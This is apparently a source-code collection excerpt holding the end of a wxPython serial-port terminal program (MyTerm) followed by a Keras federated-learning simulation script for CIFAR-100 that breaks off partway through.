self.frame.btnSetInfo.Bind(wx.EVT_BUTTON, self.OnBtnSetInfo)
self.frame.btnSave.Bind(wx.EVT_BUTTON, self.OnBtnSave)
self.SetTopWindow(self.frame)
self.frame.SetTitle( AppTitle )
self.frame.Show()
self.evtPortOpen = threading.Event()
self.evtSerialCmdBuffComplete = threading.Event()
self.IsSerialCmdBuffForAnalysis = False
self.SerialCmdBuffForAnalysis = ''
return True
def OnBtnGetInfo(self, evt = None):
if serialport.isOpen():
serialport.write('\n')
serialport.write('list\n')
self.IsSerialCmdBuffForAnalysis = True
t = threading.Thread(target = self.ThreadAnalysis)
t.start()
def ThreadAnalysis(self):
"""
the string to analysis looks like as follow:
|No.| Time | Count | Set Volt | Real Volt |
| | (ms) | | (mV) | (mV) |
|---+-------+-------+----------+-----------|
| 1 | 12345 | - | 111 | 1111.111 |
| 2 | - | 22 | 222 | 2222.222 |
| 3 | - | 33 | 333 | 3333.333 |
| 4 | - | 44 | 444 | 4444.444 |
| 5 | - | 55 | 555 | 5555.555 |
| 6 | - | - | 666 | 6666.666 |
"""
if self.evtSerialCmdBuffComplete.wait(1.0):
self.evtSerialCmdBuffComplete.clear()
for l in self.SerialCmdBuffForAnalysis.splitlines():
r = regex_matchCmdList.search(l)
if r:
i = int(r.group('index'))
if 1 <= i <= 1:
self.SetT(i, int(r.group('time')))
if 2 <= i <= 5:
self.SetC(i, int(r.group('count')))
if 1 <= i <= 6:
self.SetV(i, int(r.group('setvolt')))
self.SetRV(i, r.group('realvolt'))
self.SerialCmdBuffForAnalysis = ''
else:
print 'wait list timeout.'
def OnBtnSetInfo(self, evt = None):
if serialport.isOpen():
data = (((1, self.GetT(1)),),
((2, self.GetC(2)), (3, self.GetC(3)), (4, self.GetC(4)), (5, self.GetC(5)),),
((1, self.GetV(1)), (2, self.GetV(2)), (3, self.GetV(3)), (4, self.GetV(4)), (5, self.GetV(5)), (6, self.GetV(6)),),)
t = threading.Thread(target = ThreadSetInfo, args = (data,))
t.start()
def OnBtnSave(self, evt = None):
if serialport.isOpen():
serialport.write('\n')
serialport.write('save\n')
def GetT(self, index):
if 1 <= index <= 1:
return eval('self.frame.spin_ctrl_T' + ('%s' % index) + '.GetValue()')
def GetC(self, index):
if 2 <= index <= 5:
return eval('self.frame.spin_ctrl_C' + ('%s' % index) + '.GetValue()')
def GetV(self, index):
if 1 <= index <= 6:
return eval('self.frame.spin_ctrl_V' + ('%s' % index) + '.GetValue()')
def SetT(self, index, value):
if 1 <= index <= 1:
eval('self.frame.spin_ctrl_T' + ('%s' % index) + '.SetValue(value)')
def SetC(self, index, value):
if 2 <= index <= 5:
eval('self.frame.spin_ctrl_C' + ('%s' % index) + '.SetValue(value)')
def SetV(self, index, value):
if 1 <= index <= 6:
eval('self.frame.spin_ctrl_V' + ('%s' % index) + '.SetValue(value)')
def SetRV(self, index, label):
if 1 <= index <= 6:
eval('self.frame.label_RV' + ('%s' % index) + '.SetLabel(" %s" % label)')
def OnURL(self, evt = None):
if evt.MouseEvent.LeftUp():
webbrowser.open(evt.GetEventObject().GetValue())
evt.Skip()
def OnClear(self, evt = None):
self.frame.txtctlMain.Clear()
self.rxCount = 0
self.txCount = 0
self.frame.statusbar.SetStatusText('Rx:%d' % self.rxCount, 1)
self.frame.statusbar.SetStatusText('Tx:%d' % self.txCount, 2)
def OnSave(self, evt = None):
dlg = wx.FileDialog(self.frame,
message="Save file as ...",
defaultDir = os.getcwd(),
wildcard = "Text Files|*.txt",
style = wx.SAVE | wx.CHANGE_DIR)
if dlg.ShowModal() == wx.ID_OK:
path = dlg.GetPath()
print "You selected %s\n" % path,
# read file
f = open(path, 'w')
f.write(self.frame.txtctlMain.GetValue())
f.close()
dlg.Destroy()
def GetPort(self):
r = regex_matchPort.search(self.frame.choicePort.GetLabelText())
if r:
return int(r.group('port')) - 1
return
def GetBaudRate(self):
return int(self.frame.cmbBaudRate.GetValue())
def GetDataBits(self):
s = self.frame.choiceDataBits.GetLabelText()
if s == '5':
return serial.FIVEBITS
elif s == '6':
return serial.SIXBITS
elif s == '7':
return serial.SEVENBITS
elif s == '8':
return serial.EIGHTBITS
def GetParity(self):
s = self.frame.choiceParity.GetLabelText()
if s == 'None':
return serial.PARITY_NONE
elif s == 'Even':
return serial.PARITY_EVEN
elif s == 'Odd':
return serial.PARITY_ODD
elif s == 'Mark':
return serial.PARITY_MARK
elif s == 'Space':
return serial.PARITY_SPACE
def GetStopBits(self):
s = self.frame.choiceStopBits.GetLabelText()
if s == '1':
return serial.STOPBITS_ONE
elif s == '1.5':
return serial.STOPBITS_ONE_POINT_FIVE
elif s == '2':
return serial.STOPBITS_TWO
def MakeMenu(self, menuBar, args, menu = None):
if args[0] == MENUITEM:
menu.Append(args[1], args[2], args[3])
eval('self.frame.Bind(wx.EVT_MENU,' + args[4] + ', id = args[1])')
elif args[0] == CHECKITEM:
menu.AppendCheckItem(args[1], args[2], args[3])
eval('self.frame.Bind(wx.EVT_MENU,' + args[4] + ', id = args[1])')
elif args[0] == SEPARATOR:
menu.AppendSeparator()
elif args[0] == RADIOITEM:
menu.AppendRadioItem(args[1], args[2], args[3])
eval('self.frame.Bind(wx.EVT_MENU,' + args[4] + ', id = args[1])')
elif args[0] == SUBMENU:
submenu = wx.Menu()
for i in args[2:][0]:
self.MakeMenu(menuBar, i, submenu)
menu.AppendSubMenu(submenu, args[1])
elif args[0] == MAINMENU:
for a in args[1:]:
m = wx.Menu()
for i in a[1]:
self.MakeMenu(menuBar, i, m)
menuBar.Append(m, a[0])
def OnEnumPorts(self, evt = None):
self.frame.choicePort.Clear()
for p in EnumerateSerialPorts():
self.frame.choicePort.AppendItems((p,))
def OnBtnOpen(self, evt = None):
if serialport.isOpen():
self.OnClosePort(evt)
else:
self.OnOpenPort(evt)
def OnOpenPort(self, evt = None):
serialport.port = self.GetPort()
serialport.baudrate = self.GetBaudRate()
serialport.bytesize = self.GetDataBits()
serialport.stopbits = self.GetStopBits()
serialport.parity = self.GetParity()
serialport.rtscts = self.frame.chkboxrtscts.IsChecked()
serialport.xonxoff = self.frame.chkboxxonxoff.IsChecked()
serialport.timeout = THREAD_TIMEOUT
try:
serialport.open()
except serial.SerialException, e:
dlg = wx.MessageDialog(None, str(e), "Serial Port Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
else:
self.StartThread()
self.frame.SetTitle("%s on %s [%s, %s%s%s%s%s]" % (
AppTitle,
serialport.portstr,
serialport.baudrate,
serialport.bytesize,
serialport.parity,
serialport.stopbits,
serialport.rtscts and ' RTS/CTS' or '',
serialport.xonxoff and ' Xon/Xoff' or '',
)
)
self.frame.btnOpen.SetBackgroundColour((0,0xff,0x7f))
self.frame.btnOpen.SetLabel('Opened')
self.frame.btnOpen.Refresh()
def OnClosePort(self, evt = None):
if serialport.isOpen():
self.StopThread()
serialport.close()
self.frame.SetTitle( AppTitle )
self.frame.btnOpen.SetBackgroundColour(wx.NullColour)
self.frame.btnOpen.SetLabel('Open')
self.frame.btnOpen.Refresh()
def StartThread(self):
"""Start the receiver thread"""
self.thread = threading.Thread(target = self.UartCommThread)
# self.thread.setDaemon(1)
self.evtPortOpen.set()
self.thread.start()
def StopThread(self):
"""Stop the receiver thread, wait util it's finished."""
if self.thread is not None:
self.evtPortOpen.clear() #clear alive event for thread
self.thread.join() #wait until thread has finished
self.thread = None
def UartCommThread(self):
""" sub process for receive data from uart port """
while self.evtPortOpen.is_set():
# print 'running'
try:
text = serialport.read(1) # block for THREAD_TIMEOUT = 0.5s
except serial.serialutil.SerialException:
evt = SerialExceptEvent(self.frame.GetId(), -1)
self.frame.GetEventHandler().AddPendingEvent(evt)
print 'thread exit for except'
return -1
if text:
# print ord(text),
n = serialport.inWaiting()
if n:
text = text + serialport.read(n)
if self.rxmode == HEX:
text = ''.join(str(ord(t)) + ' ' for t in text) # text = ''.join([(c >= ' ') and c or '<%d>' % ord(c) for c in text])
self.frame.txtctlMain.AppendText(text)
else:
text = text.replace('\n', '')
if -1 != text.find(chr(wx.WXK_BACK)):
for t in text:
if t == chr(wx.WXK_BACK): #0x08
self.frame.txtctlMain.Remove(self.frame.txtctlMain.GetLastPosition() - 1,
self.frame.txtctlMain.GetLastPosition() )
else:
self.frame.txtctlMain.AppendText(t)
else:
if self.IsSerialCmdBuffForAnalysis:
self.SerialCmdBuffForAnalysis += text
if '\r\r' in self.SerialCmdBuffForAnalysis:
evt = SerialRxEvent(self.frame.GetId(), self.SerialCmdBuffForAnalysis)
self.frame.GetEventHandler().AddPendingEvent(evt)
self.IsSerialCmdBuffForAnalysis = False
self.evtSerialCmdBuffComplete.set()
else:
self.frame.txtctlMain.AppendText(text)
"""Using event to display is slow when the data is too big."""
# evt = SerialRxEvent(self.frame.GetId(), text)
# self.frame.GetEventHandler().AddPendingEvent(evt)
self.rxCount += len(text)
self.frame.statusbar.SetStatusText('Rx:%d' % self.rxCount, 1)
print 'exit thread'
def OnSerialRx(self, evt):
"""Handle input from the serial port."""
text = evt.data
if self.rxmode == HEX:
text = ''.join(str(ord(t)) + ' ' for t in text) # text = ''.join([(c >= ' ') and c or '<%d>' % ord(c) for c in text])
self.frame.txtctlMain.AppendText(text)
def OnSerialWrite(self, evt = None):
keycode = evt.GetKeyCode()
# controlDown = evt.CmdDown()
# altDown = evt.AltDown()
# shiftDown = evt.ShiftDown()
print keycode,
# if keycode == wx.WXK_SPACE:
# print "you pressed the spacebar!"
# elif controlDown and altDown:
# print keycode
if self.localEcho:
evt.Skip()
if serialport.isOpen():
if keycode < 256:
serialport.write(chr(keycode))
self.txCount += 1
self.frame.statusbar.SetStatusText('Tx:%d' % self.txCount, 2)
else:
print "Extra Key:", keycode
def OnKeyDown(self ,evt = None):
if self.localEcho:
evt.Skip()
else:
keycode = evt.GetKeyCode()
if wx.WXK_RETURN == keycode or wx.WXK_BACK == keycode:
print keycode,
if serialport.isOpen():
serialport.write(chr(keycode))
self.txCount += 1
self.frame.statusbar.SetStatusText('Tx:%d' % self.txCount, 2)
else:
evt.Skip()
def OnPaste(self ,evt = None):
data = wx.TextDataObject()
wx.TheClipboard.GetData(data)
if serialport.isOpen():
serialport.write( data.GetText() )
self.txCount += len( data.GetText() )
self.frame.statusbar.SetStatusText('Tx:%d' % self.txCount, 2)
if self.localEcho:
evt.Skip()
def OnSerialExcept(self, evt):
param = evt.param
if param == -1:
self.StopThread()
serialport.close()
self.frame.SetTitle( AppTitle )
self.frame.btnOpen.SetBackgroundColour(wx.NullColour)
self.frame.btnOpen.SetLabel('Open')
self.frame.btnOpen.Refresh()
else:
print 'OnSerialExcept() invalid parameter:%d' % param
def OnHideSettingBar(self, evt = None):
self.frame.SplitterWindow.SetSashPosition(1, True)
def OnShowSettingBar(self, evt = None):
self.frame.SplitterWindow.SetSashPosition(160, True)
def OnShowStatusBar(self, evt = None):
pass
def OnRxAsciiMode(self, evt = None):
self.rxmode = ASCII
self.frame.statusbar.SetStatusText('Rx:Ascii', 3)
def OnRxHexMode(self, evt = None):
self.rxmode = HEX
self.frame.statusbar.SetStatusText('Rx:Hex', 3)
def OnTxAsciiMode(self, evt = None):
self.txmode = ASCII
self.frame.statusbar.SetStatusText('Tx:Ascii', 4)
def OnTxHexMode(self, evt = None):
self.txmode = HEX
self.frame.statusbar.SetStatusText('Tx:Hex', 4)
def OnAlwayOnTop(self, evt = None):
if evt.Selection == 1:
style = self.frame.GetWindowStyle()
# stay on top
self.frame.SetWindowStyle( style | wx.STAY_ON_TOP )
elif evt.Selection == 0:
style = self.frame.GetWindowStyle()
# normal behavior again
self.frame.SetWindowStyle( style & ~wx.STAY_ON_TOP )
def OnLocalEcho(self, evt = None):
if evt.Selection == 1:
self.localEcho = True
self.frame.statusbar.SetStatusText('Local echo:On', 4)
elif evt.Selection == 0:
self.localEcho = False
self.frame.statusbar.SetStatusText('Local echo:Off', 4)
def OnAbout(self, evt = None):
# First we create and fill the info object
info = wx.AboutDialogInfo()
info.Name = AppTitle
info.Version = AppVersion
info.Copyright = "Copywrong All Lefts Unreserved."
info.Description = wordwrap(
'\nMyTerm offer a great solution for RS232 serial port communication.'
'\n\nIts other features including detecting the valid serial ports, '
'receiving data from serial ports and viewing it in ASCII text or hexadecimal formats, '
'echoing the sending data in local or not.',
350, wx.ClientDC(self.frame))
info.WebSite = ("https://github.com/gamesun/MyTerm#myterm", "MyTerm Home Page")
info.Developers = [ "sun.yt" ]
info.License = wordwrap("(C) 2013 Programmers and Coders Everywhere", 500, wx.ClientDC(self.frame))
info.Icon = icon32.geticon32Icon()
# Then we call wx.AboutBox giving it that info object
wx.AboutBox(info)
def OnExitApp(self, evt = None):
self.frame.Close(True) # send EVT_CLOSE
print 'exit'
def Cleanup(self, evt = None):
self.frame.Destroy()
self.OnClosePort()
# for t in threading.enumerate():
# print t.getName()
if hasattr(self, 'thread'):
if self.thread is not None:
assert not self.thread.is_alive(), "the thread should be dead but isn't!"
# self.threadCommunicate.terminate()
def ThreadSetInfo(data):
serialport.write('\n')
for d in data[0]:
time.sleep(0.15)
serialport.write('settime %d %s\n' % (d[0], d[1]))
for d in data[1]:
time.sleep(0.15)
serialport.write('setcnt %d %s\n' % (d[0], d[1]))
for d in data[2]:
time.sleep(0.15)
serialport.write('setvol %d %s\n' % (d[0], d[1]))
if __name__ == '__main__':
app = MyApp(0)
app.MainLoop()
|
federated_learning_keras_PS_CIFAR100.py
|
from DataSets import CIFARData
from consensus.consensus_v2 import CFA_process
from consensus.parameter_server import Parameter_Server
# best use with PS active
# from ReplayMemory import ReplayMemory
import numpy as np
import os
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import models
import argparse
import warnings
import glob
import datetime
import scipy.io as sio
# import multiprocessing
import threading
import math
from matplotlib.pyplot import pause
import time
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float)
parser.add_argument('-PS', default=1, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float)
parser.add_argument('-consensus', default=0, help="set 1 to enable consensus, set 0 to disable", type=float)
parser.add_argument('-mu', default=0.001, help="sets the learning rate for all setups", type=float)
parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float)
parser.add_argument('-target', default=0.5, help="sets the target loss to stop federation", type=float)
parser.add_argument('-K', default=30, help="sets the number of network devices", type=int)
parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int)
parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int)
parser.add_argument('-samp', default=500, help="sets the number samples per device", type=int)
parser.add_argument('-noniid_assignment', default=0, help=" set 0 for iid assignment, 1 for non-iid random", type=int)
parser.add_argument('-run', default=0, help=" set the run id", type=int)
parser.add_argument('-random_data_distribution', default=0, help=" set 0 for fixed distribution, 1 for time-varying", type=int)
parser.add_argument('-batches', default=5, help="sets the number of batches per learning round", type=int)
parser.add_argument('-batch_size', default=100, help="sets the batch size per learning round", type=int)
parser.add_argument('-graph', default=6, help="sets the input graph: 0 for default graph, >0 uses the input graph in vGraph.mat, and choose one graph from the available adjacency matrices", type=int)
parser.add_argument('-modelselection', default=0, help="sets the model: 0 for vgg-1", type=int)
args = parser.parse_args()
devices = args.K # NUMBER OF DEVICES
active_devices_per_round = args.Ka
n_outputs = 100 # 6 classes
max_epochs = 1000
validation_train = 50000 # VALIDATION and training DATASET size
validation_test = 10000
condition = args.modelselection
# set an arbitrary optimizer, here Adam is used
# optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
optimizer = keras.optimizers.SGD(learning_rate=args.mu, momentum=0.9)
if args.consensus == 1:
federated = True
parameter_server = False
elif args.PS == 1:
federated = False
parameter_server = True
else: # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER)
federated = False
parameter_server = False
if active_devices_per_round > devices:
active_devices_per_round = devices
target_loss = args.target
# Configuration paramaters for the whole setup
seed = 42
# batch_size = 5 # Size of batch taken from replay buffer
batch_size = args.batch_size
number_of_batches = args.batches
training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE
if (training_set_per_device > validation_train/args.K):
training_set_per_device = math.floor(validation_train/args.K)
print(training_set_per_device)
if batch_size > training_set_per_device:
batch_size = training_set_per_device
# if batch_size*number_of_batches > training_set_per_device:
# number_of_batches = math.floor(training_set_per_device/batch_size)
# number_of_batches = int(training_set_per_device/batch_size)
# number_of_batches = args.batches
number_of_batches_for_validation = int(validation_test/batch_size)
print("Number of batches for learning {}".format(number_of_batches))
max_lag = number_of_batches*2 # consensus max delay 2= 2 epochs max
refresh_server = 1 # refresh server updates (in sec)
validation_start = 1 # start validation in epochs
# Using huber loss for stability
loss_function = keras.losses.Huber()
# tf.keras.regularizers.l2(l2=0.01, **kwargs)
def get_noniid_data(total_training_size, devices, batch_size):
samples = np.random.random_integers(batch_size, total_training_size - batch_size * (devices - 1),
devices) # create random numbers
samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals
# Ignore the following if you don't need integers
samples = np.round(samples) # transform them into integers
remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done
step = 1 if remainings > 0 else -1
while remainings != 0:
i = np.random.randint(devices)
if samples[i] + step >= 0:
samples[i] += step
remainings -= step
return samples
####
def preprocess_observation(obs, batch_size):
img = obs# crop and downsize
img = (img).astype(np.float)
return img.reshape(batch_size, 32, 32, 3)
def create_q_model():
# Network defined by the Deepmind paper
inputs = layers.Input(shape=(32, 32, 3,))
if condition == 0:
# VGG 1 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Flatten()(layer3)
layer5 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer4)
classification = layers.Dense(n_outputs, activation="linear")(layer5)
elif condition == 1:
# VGG 2 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer3)
layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer4)
layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5)
layer7 = layers.Flatten()(layer6)
layer8 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer7)
classification = layers.Dense(n_outputs, activation="linear")(layer8)
else:
# VGG 3 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer3)
layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer4)
layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5)
layer7 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer6)
layer8 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer7)
layer9 = layers.MaxPooling2D(pool_size=(2, 2))(layer8)
layer10 = layers.Flatten()(layer9)
layer11 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer10)
classification = layers.Dense(n_outputs, activation="linear")(layer11)
# Convolutions
# layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs)
# layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1)
# layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2)
#
# layer4 = layers.Flatten()(layer3)
#
# layer5 = layers.Dense(512, activation="relu")(layer4)
# classification = layers.Dense(n_outputs, activation="linear")(layer5)
return keras.Model(inputs=inputs, outputs=classification)
def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1):
model_global = create_q_model()
model_parameters_initial = np.asarray(model_global.get_weights())
parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round)
global_target_model = 'results/model_global.npy'
np.save(global_target_model, model_parameters_initial)
pause(5) # wait for neighbors
while True:
pause(refresh_server) # refresh global model on every xx seconds
np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch=0, aggregation_type=0))
fileList = glob.glob('*.mat', recursive=False)
if len(fileList) == devices:
# stop the server
break
# execute for each deployed device
def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution):
pause(5) # PS server (if any) starts first
checkpointpath1 = 'results/model{}.h5'.format(device_index)
outfile = 'results/dump_train_variables{}.npz'.format(device_index)
outfile_models = 'results/dump_train_model{}.npy'.format(device_index)
global_model = 'results/model_global.npy'
np.random.seed(1)
tf.random.set_seed(1) # common initialization
learning_rate = args.mu
learning_rate_local = learning_rate
B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices)
Probabilities = B[device_index, :]/(devices - 1)
training_signal = False
# check for backup variables on start
if os.path.isfile(checkpointpath1):
train_start = False
# backup the model and the model target
model = models.load_model(checkpointpath1)
data_history = []
label_history = []
local_model_parameters = np.load(outfile_models, allow_pickle=True)
model.set_weights(local_model_parameters.tolist())
dump_vars = np.load(outfile, allow_pickle=True)
frame_count = dump_vars['frame_count']
epoch_loss_history = dump_vars['epoch_loss_history'].tolist()
running_loss = np.mean(epoch_loss_history[-5:])
epoch_count = dump_vars['epoch_count']
else:
train_start = True
model = create_q_model()
data_history = []
label_history = []
frame_count = 0
# Experience replay buffers
epoch_loss_history = []
epoch_count = 0
running_loss = math.inf
training_end = False
# create a data object (here radar data)
data_handle = CIFARData(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
# create a consensus object
cfa_consensus = CFA_process(devices, device_index, args.N)
while True: # Run until solved
# collect 1 batch
frame_count += 1
obs, labels = data_handle.getTrainingData(batch_size)
data_batch = preprocess_observation(obs, batch_size)
# Save data and labels in the current learning session
data_history.append(data_batch)
label_history.append(labels)
# Local learning update every "number of batches" batches
if frame_count % number_of_batches == 0 and not training_signal:
epoch_count += 1
for i in range(number_of_batches):
data_sample = np.array(data_history[i])
label_sample = np.array(label_history[i])
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
with tf.GradientTape() as tape:
# Train the model on data samples
classes = model(data_sample)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Calculate loss
loss = loss_function(label_sample, class_v)
# Backpropagation
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
del data_history
del label_history
data_history = []
label_history = []
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# Consensus round
# update local model
cfa_consensus.update_local_model(model_weights)
# neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
# neighbor = np.random.choice(np.arange(devices), args.N, p=Probabilities, replace=False) # choose neighbor
neighbor = np.random.choice(np.arange(devices), args.N, replace=False) # choose neighbor
while neighbor == device_index:
neighbor = np.random.choice(np.arange(devices), args.N, replace=False)
if not train_start:
if federated and not training_signal:
eps_c = 1 / (args.N + 1)
# apply consensus for model parameter
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, frame_count, eps_c, max_lag))
if cfa_consensus.getTrainingStatusFromNeightbor():
# a neighbor completed the training, with loss < target, transfer learning is thus applied (the device will copy and reuse the same model)
training_signal = True # stop local learning, just do validation
else:
print("Warm up")
train_start = False
# check if parameter server is enabled
stop_aggregation = False
if parameter_server:
pause(refresh_server)
while not os.path.isfile(global_model):
# implementing consensus
print("waiting")
pause(1)
try:
model_global = np.load(global_model, allow_pickle=True)
except:
pause(5)
print("retrying opening global model")
try:
model_global = np.load(global_model, allow_pickle=True)
except:
print("halting aggregation")
stop_aggregation = True
if not stop_aggregation:
# print("updating from global model inside the parmeter server")
for k in range(cfa_consensus.layers):
# model_weights[k] = model_weights[k]+ 0.5*(model_global[k]-model_weights[k])
model_weights[k] = model_global[k]
model.set_weights(model_weights.tolist())
del model_weights
# validation tool for device 'device_index'
if epoch_count > validation_start and frame_count % number_of_batches == 0:
avg_cost = 0.
for i in range(number_of_batches_for_validation):
obs_valid, labels_valid = data_handle.getTestData(batch_size, i)
# obs_valid, labels_valid = data_handle.getRandomTestData(batch_size)
data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size)
data_sample = np.array(data_valid)
label_sample = np.array(labels_valid)
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
classes = model(data_sample)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Calculate loss
loss = loss_function(label_sample, class_v)
avg_cost += loss / number_of_batches_for_validation # Training loss
epoch_loss_history.append(avg_cost)
print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count,
avg_cost))
# mean loss for last 5 epochs
running_loss = np.mean(epoch_loss_history[-5:])
if running_loss < target_loss or training_signal: # Condition to consider the task solved
print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA2_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if epoch_count > max_epochs: # stop simulation
print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
